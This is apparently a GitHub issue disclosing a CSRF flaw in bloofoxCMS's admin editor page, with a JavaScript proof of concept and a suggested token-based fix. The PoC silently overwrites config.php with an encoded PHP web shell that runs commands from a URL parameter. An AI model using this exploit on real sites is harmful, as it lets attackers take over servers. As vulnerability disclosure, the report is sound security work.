I discovered a CSRF Vulnerability in bloofoxCMS/admin/index.php?mode=settings&page=editor, the request validation was not there to avoid CSRF Attacks.
PoC :-
<script>
var bloofox = new XMLHttpRequest();
bloofox.onreadystatechange = function() {if(this.readyState==4){alert('Done');}};bloofox.open("POST","http://localhost/bloofoxCMS/admin/index.php?mode=settings&page=editor",true);bloofox.withCredentials=true;bloofox.send('file=%3C%3F%3D%60%24_GET%5B1%5D%60%3B&backlink=&fileurl=config.php&send=Save');</script>
Impact
Change any file content in webserver (Locally/Remotely)
I discovered a CSRF Vulnerability in
bloofoxCMS/admin/index.php?mode=settings&page=editor, the request validation was not there to avoid CSRF Attacks.PoC :-
Impact
Change any file content in webserver (Locally/Remotely)
Fix
Synchronizer Token Pattern
The text was updated successfully, but these errors were encountered: